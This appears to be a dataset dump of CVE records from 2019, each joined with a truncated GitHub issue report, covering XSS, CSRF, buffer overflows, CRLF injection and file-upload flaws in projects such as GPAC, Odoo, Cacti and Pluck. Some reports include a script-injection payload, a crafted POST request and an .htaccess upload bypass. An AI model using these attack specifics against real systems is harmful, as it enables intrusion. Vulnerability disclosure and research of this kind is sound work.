cve_id stringlengths 13 16 | cve_published stringdate 2019-01-01 16:29:00 2025-02-25 20:15:37 | cve_descriptions stringlengths 34 2.6k | cve_metrics dict | cve_references listlengths 1 281 | cve_configurations listlengths 1 70 | cve_cwe_list listlengths 1 1 | cve_primary_cwe stringclasses 164
values | url stringlengths 36 97 | cve_tags listlengths 1 5 ⌀ | domain stringclasses 1
value | issue_owner_repo listlengths 2 2 | issue_body stringlengths 0 198k ⌀ | issue_title stringlengths 1 335 | issue_comments_url stringlengths 55 116 | issue_comments_count int64 0 338 | issue_created_at stringdate 2012-06-06 09:34:24 2025-04-02 09:37:20 | issue_updated_at stringdate 2014-04-01 20:16:21 2025-06-16 12:26:58 | issue_html_url stringlengths 36 97 | issue_github_id int64 4.93M 2.97B | issue_number int64 1 199k | __index_level_0__ int64 0 6.55k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
CVE-2019-10740 | 2019-04-07T15:29:00.387 | In Roundcube Webmail before 1.3.10, an attacker in possession of S/MIME or PGP encrypted emails can wrap them as sub-parts within a crafted multipart email. The encrypted part(s) can further be hidden using HTML/CSS or ASCII newline characters. This modified multipart email can be re-sent by the attacker to the intende... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00083.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:roundcube:webmail:*:*:*:*:*:*:*:*",
"matchCriteriaId": "21944990-D120-49D4-8C58-2395666903D2",
"versionEndExcluding": "1.3.10",
"versionEndIncluding": null,
"versionStartExcl... | [
"319"
] | 319 | https://github.com/roundcube/roundcubemail/issues/6638 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"roundcube",
"roundcubemail"
] | In the scope of academic research in cooperation with Ruhr-Uni Bochum and FH Münster, Germany we discovered a security issue in Roundcube/Enigma: An attacker who is in possession of PGP encrypted messages can embed them into a multipart message and re-send them to the intended receiver. When the message is read and dec... | Decryption Oracle based on replying to PGP encrypted emails | https://api.github.com/repos/roundcube/roundcubemail/issues/6638/comments | 3 | 2019-02-22T10:49:17Z | 2019-05-11T14:25:36Z | https://github.com/roundcube/roundcubemail/issues/6638 | 413,348,015 | 6,638 | 306 |
CVE-2019-11002 | 2019-04-08T18:29:00.333 | In Materialize through 1.0.0, XSS is possible via the Tooltip feature. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Dogfalo/materialize/issues/6286"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Thi... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:materializecss:materialize:*:*:*:*:*:*:*:*",
"matchCriteriaId": "16CE4215-C9F6-4B35-98B2-3E2D6F7FDF43",
"versionEndExcluding": null,
"versionEndIncluding": "1.0.0",
"versionS... | [
"79"
] | 79 | https://github.com/Dogfalo/materialize/issues/6286 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Dogfalo",
"materialize"
] | ## Expected Behavior
Don't execute html/javascript by default for Toasts, Tooltips and Autocomplete
## Current Behavior
By default when you add dynamics contents like Toast, Tooltips and autocomplete you inject inputs data as HTML. I think all people who use MaterializeCss implement compontents like your example... | Security question: Use HTML by default for Toasts/Tooltips/Autocomplete and expose an XSS | https://api.github.com/repos/Dogfalo/materialize/issues/6286/comments | 30 | 2019-02-08T16:46:36Z | 2019-05-26T08:48:56Z | https://github.com/Dogfalo/materialize/issues/6286 | 408,234,469 | 6,286 | 307 |
CVE-2019-11018 | 2019-04-08T21:29:01.360 | application\admin\controller\User.php in ThinkAdmin V4.0 does not prevent continued use of an administrator's cookie-based credentials after a password change. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/zoujingli/ThinkAdmin/issues/173"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Thi... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thinkadmin:thinkadmin:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F18AC967-705F-4D26-ACD1-05D9DF39B4E6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartEx... | [
"287"
] | 287 | https://github.com/zoujingli/ThinkAdmin/issues/173 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"zoujingli",
"ThinkAdmin"
] | There is a authority control&Information Disclosure vulnerability inThinkAdmin v4.0.
As admin,if you change your password,your cookie won't become invalid. And it won't become invalid until the end of Life Cycle.So if attackers got admin's cookie,though traces of the attackers were found,and admin change his password... | ThinkAdmin V4.0 authority control&Information Disclosure vulnerability | https://api.github.com/repos/zoujingli/ThinkAdmin/issues/173/comments | 2 | 2019-04-06T13:40:53Z | 2019-04-08T10:43:20Z | https://github.com/zoujingli/ThinkAdmin/issues/173 | 430,034,837 | 173 | 308 |
CVE-2019-11024 | 2019-04-08T23:29:00.790 | The load_pnm function in frompnm.c in libsixel.a in libsixel 1.8.2 has infinite recursion. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/saitoha/libsixel/issues/85"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://research.loginsoft.com/bugs/15... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libsixel_project:libsixel:1.8.2:*:*:*:*:*:*:*",
"matchCriteriaId": "BAFCC979-2F4E-46A5-AC18-B6452E752D90",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionS... | [
"674"
] | 674 | https://github.com/saitoha/libsixel/issues/85 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"saitoha",
"libsixel"
] | **Description** : we Observerd an infinite recursive loop at function load_pnm( ) at file frompnm.c which can lead to a denial of service attack.
**Command** : ./img2sixel -78eIkiugv -w 4 -h 8 -q auto -l force -o out $POC
**POC** : [REPRODUCER](https://github.com/SegfaultMasters/covering360/blob/master/libsexel/PO... | infinite recursive loop in load_pnm( ) | https://api.github.com/repos/saitoha/libsixel/issues/85/comments | 2 | 2019-03-29T05:47:49Z | 2019-12-18T20:34:07Z | https://github.com/saitoha/libsixel/issues/85 | 426,827,367 | 85 | 309 |
CVE-2019-11025 | 2019-04-08T23:29:00.853 | In clearFilter() in utilities.php in Cacti before 1.2.3, no escaping occurs before printing out the value of the SNMP community string (SNMP Options) in the View poller cache, leading to XSS. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/Cacti/cacti/compare/6ea486a...99995bb"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url"... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5C1989C8-DBC3-4926-8AA3-245A0E8FE2DC",
"versionEndExcluding": "1.2.3",
"versionEndIncluding": null,
"versionStartExcluding":... | [
"79"
] | 79 | https://github.com/Cacti/cacti/issues/2581 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Cacti",
"cacti"
] | **Describe the bug**
There's no escape being done before printing out the value of `SNMP community string` (SNMP Options) in the `View poller cache`.
**To Reproduce**
Steps to reproduce the behavior:
1. Login as normal user ( should have device creation explicitly enabled ).
2. Select create a new device from th... | When viewing poller cache, Device SNMP community is not properly escaped | https://api.github.com/repos/Cacti/cacti/issues/2581/comments | 2 | 2019-03-28T10:14:04Z | 2020-06-30T03:46:01Z | https://github.com/Cacti/cacti/issues/2581 | 426,407,384 | 2,581 | 310 |
CVE-2018-15631 | 2019-04-09T16:29:01.087 | Improper access control in the Discuss App of Odoo Community 12.0 and earlier, and Odoo Enterprise 12.0 and earlier allows remote authenticated attackers to e-mail themselves arbitrary files from the database, via a crafted RPC request. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "security@odoo.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/odoo/odoo/issues/32516"
},
{
"source": "security@odoo.com",
"tags": [
"Third Party Advisory"
],
"url": "https://www.excellium-services.com/cert-xlm-advisory/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*",
"matchCriteriaId": "A958BCBB-C656-44A5-A9A9-66A66AEA67A0",
"versionEndExcluding": null,
"versionEndIncluding": "12.0",
"versionStartExclud... | [
"284"
] | 284 | https://github.com/odoo/odoo/issues/32516 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - ODOO-SA-2018-11-28-3
Improper access control in the Discuss App of Odoo Community 12.0 and earlier, and Odoo Enterprise 12.0 and earlier allows remote authenticated attackers to e-mail themselves arbitrary files from the database, via a crafted RPC request.
**Affects**: Odoo Community 12.0 and e... | [SEC] ODOO-SA-2018-11-28-3 (CVE-2018-15631) - Improper access control in the... | https://api.github.com/repos/odoo/odoo/issues/32516/comments | 0 | 2019-04-08T13:40:55Z | 2019-04-08T13:40:57Z | https://github.com/odoo/odoo/issues/32516 | 430,458,377 | 32,516 | 311 |
CVE-2018-15635 | 2019-04-09T16:29:01.130 | Cross-site scripting vulnerability in the Discuss App of Odoo Community 12.0 and earlier, and Odoo Enterprise 12.0 and earlier allows remote attackers to inject arbitrary web script in the browser of an internal user of the system by tricking them into inviting a follower on a document with a crafted name. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "security@odoo.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/odoo/odoo/issues/32515"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/odoo/odoo/issues/32515"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*",
"matchCriteriaId": "A958BCBB-C656-44A5-A9A9-66A66AEA67A0",
"versionEndExcluding": null,
"versionEndIncluding": "12.0",
"versionStartExclud... | [
"79"
] | 79 | https://github.com/odoo/odoo/issues/32515 | [
"Third Party Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - ODOO-SA-2018-11-28-2
Cross-site scripting vulnerability in the Discuss App of Odoo Community 12.0 and earlier, and Odoo Enterprise 12.0 and earlier allows remote attackers to inject arbitrary web script in the browser of an internal user of the system by tricking them into inviting a follower on ... | [SEC] ODOO-SA-2018-11-28-2 (CVE-2018-15635) - Cross-site scripting vulnerabil... | https://api.github.com/repos/odoo/odoo/issues/32515/comments | 0 | 2019-04-08T13:40:52Z | 2019-04-08T13:40:54Z | https://github.com/odoo/odoo/issues/32515 | 430,458,345 | 32,515 | 312 |
CVE-2018-15640 | 2019-04-09T16:29:01.193 | Improper access control in the Helpdesk App of Odoo Enterprise 10.0 through 12.0 allows remote authenticated attackers to obtain elevated privileges via a crafted request. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "COMPLETE",
"baseScore": 9,
"confidentialityImpact": "COMPLETE... | [
{
"source": "security@odoo.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/odoo/odoo/issues/32514"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "A4C406AC-8BCE-431E-9E09-7A793E3C750F",
"versionEndExcluding": null,
"versionEndIncluding": "12.0",
"versionStartExclu... | [
"863"
] | 863 | https://github.com/odoo/odoo/issues/32514 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - ODOO-SA-2018-11-28-1
Improper access control in the Helpdesk App of Odoo Enterprise 10.0 through 12.0 allows remote authenticated attackers to obtain elevated privileges via a crafted request.
**Affects**: Odoo 10.0 Enterprise through 12.0 (Enterprise Editions only)
**Component**: Helpdesk
**Cre... | [SEC] ODOO-SA-2018-11-28-1 (CVE-2018-15640) - Improper access control in the... | https://api.github.com/repos/odoo/odoo/issues/32514/comments | 0 | 2019-04-08T13:40:48Z | 2019-04-08T13:40:50Z | https://github.com/odoo/odoo/issues/32514 | 430,458,311 | 32,514 | 313 |
CVE-2017-18366 | 2019-04-15T12:30:57.697 | Subrion CMS 4.1.5 has CSRF in blog/delete/. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/intelliants/subrion/issues/477"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://git... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:intelliants:subrion_cms:4.1.5:*:*:*:*:*:*:*",
"matchCriteriaId": "3499035D-709C-40B3-ADE9-5B00F7790E2D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | [
"352"
] | 352 | https://github.com/intelliants/subrion/issues/477 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"intelliants",
"subrion"
] | Hi subrion security team,
### Bug Description
Cross-site request forgery(CSRF), also known as a one-click attack or session riding and abbreviated as CSRF or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.
### Steps to reprodu... | Critical : Remove Blog Post using CSRF attack | https://api.github.com/repos/intelliants/subrion/issues/477/comments | 3 | 2017-06-30T19:41:33Z | 2017-07-06T07:40:48Z | https://github.com/intelliants/subrion/issues/477 | 239,871,435 | 477 | 314 |
CVE-2018-18261 | 2019-04-15T12:31:20.290 | In waimai Super Cms 20150505, there is an XSS vulnerability via the /admin.php/Foodcat/addsave fcname parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/caokang/waimai/issues/7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:bijiadao:waimai_super_cms:20150505:*:*:*:*:*:*:*",
"matchCriteriaId": "8945479A-0C5E-4FC7-9D88-BC42E8EA0C3C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versi... | [
"79"
] | 79 | https://github.com/caokang/waimai/issues/7 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"caokang",
"waimai"
] | In waimai Super Cms 20150505,there is an XSS vulnerability via the /admin.php/Foodcat/addsave fcname parameter.
Payload:<script>alert(1);</script>
POST /sug/waimaicmsn/waimai-master/admin.php?m=Foodcat&a=addsave HTTP/1.1
Host: xx.x.x.x:xxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Fire... | xss Vulnerability in Waimai Super Cms 20150505 via fcname parameter | https://api.github.com/repos/caokang/waimai/issues/7/comments | 0 | 2018-10-11T13:51:14Z | 2018-10-11T13:51:14Z | https://github.com/caokang/waimai/issues/7 | 369,131,484 | 7 | 315 |
CVE-2019-11221 | 2019-04-15T12:31:36.477 | GPAC 0.7.1 has a buffer overflow issue in gf_import_message() in media_import.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1203"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:0.7.1:*:*:*:*:*:*:*",
"matchCriteriaId": "2CC18384-9350-47D7-A07D-C7D29622AE9E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": ... | [
"787"
] | 787 | https://github.com/gpac/gpac/issues/1203 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | There is a buffer overflow issue in gf_import_message () function, media_import.c
szMsg overflow when srt file contains more than one txt line and the line is long enough.
GF_Err gf_import_message(GF_MediaImporter *import, GF_Err e, char *format, ...)
{
if (gf_log_tool_level_on(GF_LOG_AUTHOR, e ? GF_LOG_WARN... | buffer overflow issue 6# | https://api.github.com/repos/gpac/gpac/issues/1203/comments | 6 | 2019-02-12T03:44:32Z | 2019-04-19T09:00:55Z | https://github.com/gpac/gpac/issues/1203 | 409,106,668 | 1,203 | 316 |
CVE-2019-11222 | 2019-04-15T12:31:36.507 | gf_bin128_parse in utils/os_divers.c in GPAC 0.7.1 has a buffer overflow issue for the crypt feature when encountering a crafted_drm_file.xml file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/gpac/gpac/commit/f3698bb1bce62402805c3fda96551a23101a32f9"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:0.7.1:*:*:*:*:*:*:*",
"matchCriteriaId": "2CC18384-9350-47D7-A07D-C7D29622AE9E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": ... | [
"787"
] | 787 | https://github.com/gpac/gpac/issues/1204 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | there is a buffer overflow issue for crypt feature when use a crafted_drm_file.xml file.
overflow occur when use a crafted key value.
root@ubuntu:/opt/niugx/cov_product/gpac/gpac-master/bin/gcc# gdb ./MP4Box
(gdb) set args -crypt crafted_drm_file.xml overview.mp4 -out overview_encrypted.mp4
(gdb) r
Starting p... | buffer overflow issue 7# | https://api.github.com/repos/gpac/gpac/issues/1204/comments | 1 | 2019-02-13T07:12:39Z | 2019-04-19T08:50:59Z | https://github.com/gpac/gpac/issues/1204 | 409,659,238 | 1,204 | 317 |
CVE-2019-11222 | 2019-04-15T12:31:36.507 | gf_bin128_parse in utils/os_divers.c in GPAC 0.7.1 has a buffer overflow issue for the crypt feature when encountering a crafted_drm_file.xml file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/gpac/gpac/commit/f3698bb1bce62402805c3fda96551a23101a32f9"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:0.7.1:*:*:*:*:*:*:*",
"matchCriteriaId": "2CC18384-9350-47D7-A07D-C7D29622AE9E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": ... | [
"787"
] | 787 | https://github.com/gpac/gpac/issues/1205 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | there is a buffer overflow issue for crypt feature when use a crafted_drm_file.xml file.
overflow occur when use a crafted ID128 value.
root@ubuntu:/opt/niugx/cov_product/gpac/gpac-master/bin/gcc# gdb ./MP4Box
(gdb) set args -crypt drm_file.xml overview.mp4 -out overview_encrypted.mp4
(gdb) r
Starting program... | buffer overflow issue 8# | https://api.github.com/repos/gpac/gpac/issues/1205/comments | 1 | 2019-02-13T09:49:56Z | 2019-04-19T08:50:26Z | https://github.com/gpac/gpac/issues/1205 | 409,715,577 | 1,205 | 318 |
CVE-2019-11236 | 2019-04-15T15:29:00.637 | In the urllib3 library through 1.24.1 for Python, CRLF injection is possible if the attacker controls the request parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00039.html"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00041.html"
},
{
"source": "cve@mit... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:python:urllib3:*:*:*:*:*:*:*:*",
"matchCriteriaId": "304CBF27-88DD-4DF2-8A3A-FD4C02C42895",
"versionEndExcluding": null,
"versionEndIncluding": "1.24.2",
"versionStartExcludi... | [
"93"
] | 93 | https://github.com/urllib3/urllib3/issues/1553 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"urllib3",
"urllib3"
] | At https://bugs.python.org/issue36276 there's an issue in Python's urllib that an attacker controlling the request parameter can inject headers by injecting CR/LF chars.
A commenter mentions that the same bug is present in urllib3:
https://bugs.python.org/issue36276#msg337837
So reporting it here to make sure it... | CRLF injection vulnerability | https://api.github.com/repos/urllib3/urllib3/issues/1553/comments | 32 | 2019-03-18T17:17:07Z | 2019-05-02T17:50:22Z | https://github.com/urllib3/urllib3/issues/1553 | 422,338,889 | 1,553 | 319 |
CVE-2018-20200 | 2019-04-18T19:29:01.347 | CertificatePinner.java in OkHttp 3.x through 3.12.0 allows man-in-the-middle attackers to bypass certificate pinning by changing SSLContext and the boolean values while hooking the application. NOTE: This id is disputed because some parties don't consider this is a vulnerability. Their rationale can be found in https:/... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://cxsecurity.com/issue/WLB-2018120252"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/square/okhttp/commits/m... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:squareup:okhttp:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F6889A8C-87B7-49BE-B316-62267FEF895E",
"versionEndExcluding": null,
"versionEndIncluding": "3.12.0",
"versionStartExclud... | [
"295"
] | 295 | https://github.com/square/okhttp/issues/4967 | null | github.com | [
"square",
"okhttp"
] | Apparently there was [CVE-2018-20200](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20200) for an issue described as
> CertificatePinner.java in OkHttp 3.x through 3.12.0 allows man-in-the-middle attackers to bypass certificate pinning by changing SSLContext and the boolean values while hooking the applica... | CVE-2018-20200: CertificatePinner.java allows man-in-the-middle attackers to bypass certificate pinning | https://api.github.com/repos/square/okhttp/issues/4967/comments | 6 | 2019-04-19T09:16:04Z | 2020-07-05T07:07:32Z | https://github.com/square/okhttp/issues/4967 | 435,109,866 | 4,967 | 320 |
CVE-2019-11344 | 2019-04-19T19:29:00.233 | data/inc/files.php in Pluck 4.7.8 allows remote attackers to execute arbitrary code by uploading a .htaccess file that specifies SetHandler x-httpd-php for a .txt file, because only certain PHP-related filename extensions are blocked. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/pluck-cms/pluck/issues/72"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.c... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pluck-cms:pluck:4.7.8:*:*:*:*:*:*:*",
"matchCriteriaId": "DFF082EE-B695-400E-BF54-FC8707FBBE3E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | [
"434"
] | 434 | https://github.com/pluck-cms/pluck/issues/72 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"pluck-cms",
"pluck"
] | Location: https://github.com/pluck-cms/pluck/blob/master/data/inc/files.php#L40
Code:
```php
<?php
// ......
$blockedExtentions = array('.php','php3','php4','php5','php6','php7','phtml');
if (in_array($lastfour, $blockedExtentions) or in_array($lastfive, $blockedExtentions) ){
if (!rename('files/'.l... | file-upload vulnerability in data/inc/files.php | https://api.github.com/repos/pluck-cms/pluck/issues/72/comments | 4 | 2019-04-09T14:45:54Z | 2019-05-29T16:19:45Z | https://github.com/pluck-cms/pluck/issues/72 | 431,009,393 | 72 | 321 |
CVE-2019-11359 | 2019-04-20T00:29:00.480 | Cross-site scripting (XSS) vulnerability in display.php in I, Librarian 4.10 allows remote attackers to inject arbitrary web script or HTML via the project parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/mkucej/i-librarian/issues/138"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://gith... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:i-librarian:i\\,_librarian:4.10:*:*:*:*:*:*:*",
"matchCriteriaId": "C1942913-38F2-41F7-80F9-887EE83FC680",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionS... | [
"79"
] | 79 | https://github.com/mkucej/i-librarian/issues/138 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"mkucej",
"i-librarian"
] | ## Summary
The parameter `project` is not sanitized, so attackers can poison this parameter and then create a reflected XSS attack.
## PoC
